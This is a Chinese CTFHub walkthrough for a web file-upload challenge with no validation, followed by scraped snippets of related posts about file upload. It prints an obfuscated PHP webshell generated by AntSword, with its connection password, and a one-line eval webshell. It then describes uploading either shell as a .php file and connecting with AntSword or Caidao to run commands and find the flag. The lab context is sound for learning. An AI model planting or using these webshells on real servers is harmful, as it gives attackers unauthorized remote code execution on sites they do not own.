CTFHub技能树-Web-文件上传-无验证

目录

  • 题目
  • 思路
  • 工具
  • 解法

题目

思路

  • 上传一句话木马,获取shell

工具

1、weevely,kali自带,可以生成一句话木马

2、中国蚁剑 https://github.com/AntSwordProject/antSword

windows下图形化的软件,下载安装都容易,升级版的中国菜刀

解法

1、用中国蚁剑里的插件做的一句话木马 名字是 生成shell

2、安装完后生成

3、非常高级

<?php // 使用时请删除此行, 连接密码: amNtMUqc ?>
<?php $hgey=create_function(chr(31536/876).chr(0646-0463).chr(01531-01352).base64_decode(‘bQ==‘).str_rot13(‘r‘),chr(0175666/01176).chr(738-620).base64_decode(‘YQ==‘).base64_decode(‘bA==‘).chr(01641-01571).chr(20196/561).chr(0407-0224).str_rot13(‘b‘).chr(98100/900).chr(0x220-0x1bb).base64_decode(‘KQ==‘).base64_decode(‘Ow==‘));$hgey(base64_decode(‘OTIzO‘.‘DU1O0‘.‘BldkF‘.‘sKCRf‘.‘‘.chr(909-824).chr(0163375/01531).chr(0x15a-0x121).str_rot13(‘G‘).base64_decode(‘Vg==‘).‘‘.‘‘.str_rot13(‘S‘).str_rot13(‘g‘).chr(231-127).str_rot13(‘o‘).base64_decode(‘VQ==‘).‘‘.‘50TVV‘.‘xY10p‘.‘OzI3N‘.‘zE1Nj‘.‘U7‘.‘‘));?>

4、没有验证就很简单了,直接保存到文本里,后缀改.php,上传就可以了

5、填入地址,填入密码

6、然后就能执行shell,查看目录,上一层目录找一下就有了

原文地址:https://www.cnblogs.com/carr0t/p/12594682.html

时间: 2024-08-30 18:21:35

CTFHub技能树-Web-文件上传-无验证的相关文章

ctfhub技能树—文件上传—无验证

打开靶机 查看页面信息 编写一句话木马 <?php echo "123"; @eval(@$_POST['a']); ?> 上传木马 上传成功,并拿到相对路径地址 查看页面信息 使用蚁剑或菜刀连接 查看目录信息 查看flag_368114112.php文件信息 成功拿到flag 原文地址:https://www.cnblogs.com/anweilx/p/12523268.html

Web文件上传原理

采用WEB技术实现B/S(浏览器/服务器)结构的管理系统是办公自动化的发展趋势.基于WEB技术的管理系统,由于开发周期短:与用户平台无关:易于实现交互式应用:能对信息进行快速.高效的收集.处理和发布,近几年来得到了迅速发展.而ASP技术由于其开发效率高.交互性好,安全性强等特点,逐渐成为开发管理系统的首选工具. 许多基于WEB的应用都涉及文件上传操作.常见的文件上传技术有:基于HTTP协议的:基于VB(或DELPHI等编程语言)开发的文件上传组件的:基于数据库技术的等等.这些方法一般都需要编程者

Java Web文件上传

一. Java Web文件上传需要借助一些第三方库,常用的是借助Apache的包,有两个: commons-fileupload commons-io 二.前端代码示例: <form method="post" id="uploadApkForm" action="uploadapk" enctype="multipart/form-data"> <p> 文件:<input name="

WEB文件上传下载过程简介(基于Struts2)

WEB文件上传过程简介(基于Struts2),页面上传.Action收取.解析:文件导出 文件处理过程,需要注意对文件的定期清理,避免磁盘占用过多: 1. jsp页面:   <s:file required="true" name ="myFile" theme="zx2"/> <s:form action ="myfile.action" name="form" method =&quo

ctfhub技能树—文件上传—前端验证

打开靶机 查看页面信息 尝试直接上传一句话木马 提示不允许上传 查看源码 发现仅允许上传.jpg,.png,.gif三种格式的文件 上传shell.jpg并使用burpsuite抓取数据包 添加完成后再次尝试上传 更改shell.jpg为shell.php 放包 查看文件信息 使用菜刀或蚁剑连接 查找flag 成功拿到flag 原文地址:https://www.cnblogs.com/anweilx/p/12523459.html

轻量级 web 文件上传组件,支持html5,支持上传进度显示(IE10+、标准浏览器),文件拖拽,降级支持IE6+

老早就注册了博客园帐号,昨天才发现,连博客都没开,Github也是一样,深觉惭愧,赶紧潜个水压压惊`(*∩_∩*)′ 言归正传.大概许多人都会用到文件上传的功能,上传的库貌似也不少,比如(jQuery File Uploader.FineUploader.Uploadify.Baidu Web Uploader 等等),功能都很强大,代码量一般也较大.当时心想,就这么个小功能,杀鸡焉用牛刀,用库的话还得熟悉它的用法,有的需要引入额外的库,纯Flash的不考虑,还是动手造个轮子得了,至少造过之后能

轻量级 web 文件上传组件,纯js,html5、html4智能适配,支持上传进度显示(IE10+、标准浏览器)

老早就注册了博客园帐号,昨天才发现,连博客都没开,Github也是一样,深觉惭愧,赶紧潜个水压压惊`(*∩_∩*)′ 言归正传.大概许多人都会用到文件上传的功能,上传的库貌似也不少,比如(jQuery File Uploader.FineUploader.Uploadify.Baidu Web Uploader 等等),功能都很强大,代码量一般也较大.当时心想,就这么个小功能,杀鸡焉用牛刀,用库的话还得熟悉它的用法,有的需要引入额外的库,纯Flash的不考虑,还是动手造个轮子得了,至少造过之后能

java web 文件上传下载

文件上传下载案例: 首先是此案例工程的目录结构: 处理上传: FileUploadServlet.java 1 package fnz.fileUploadTest; 2 3 import java.io.File; 4 import java.io.IOException; 5 import java.io.InputStream; 6 import java.io.PrintWriter; 7 import java.text.SimpleDateFormat; 8 import java.

web 文件上传组件 Plupload

Plupload官网:点击打开链接   建议下载最新版本,低版本会出现浏览器兼容问题. 最近公司有个项目需要在web端使用多文件上传功能,刚开始准备使用HTML5来做,但是IE9以下是都不支持的,于是想到了flash,在网上搜了下各种开源的组件,最后决定使用Plupload,下面来介绍一下该组件使用时遇到的一些问题以及解决方案. 先贴出配置参数: <script type="text/javascript"> // Initialize the widget when th